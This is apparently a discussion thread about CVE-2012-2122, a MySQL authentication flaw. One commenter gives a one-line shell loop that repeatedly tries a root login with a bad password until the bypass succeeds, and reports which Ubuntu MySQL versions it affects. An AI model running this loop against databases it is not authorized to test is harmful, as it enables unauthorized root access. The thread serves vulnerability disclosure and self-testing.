

A Tragically Comedic Security Flaw in MySQL - stfu
https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

======
kator
From user command line:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1
2>/dev/null; done

Confirmed it gets in easily on:

Ubuntu 11.10 (GNU/Linux 3.0.0-14-server x86_64) mysql 5.1.62-0ubuntu0.11.10.1

Does not seem to apply to: 5.1.58-1ubuntu1

------
kator
Quick way you can check for the memcmp issue in your libc:

<http://pastie.org/4064638>

